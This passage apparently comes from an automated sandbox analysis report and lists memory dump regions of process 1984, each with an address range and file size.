                                                    184KB

                                                  • memory/1984-326-0x00007FFBA7C70000-0x00007FFBA7C7D000-memory.dmp

                                                    Filesize

                                                    52KB

                                                  • memory/1984-325-0x00007FFBA2BE0000-0x00007FFBA2BF9000-memory.dmp

                                                    Filesize

                                                    100KB

                                                  • memory/1984-324-0x00007FFB8CDE0000-0x00007FFB8CF51000-memory.dmp

                                                    Filesize

                                                    1.4MB

                                                  • memory/1984-323-0x00007FFBA4740000-0x00007FFBA475F000-memory.dmp

                                                    Filesize

                                                    124KB

                                                  • memory/1984-322-0x00007FFBA4840000-0x00007FFBA4859000-memory.dmp

                                                    Filesize

                                                    100KB

                                                  • memory/1984-321-0x00007FFB9F410000-0x00007FFB9F43D000-memory.dmp

                                                    Filesize

                                                    180KB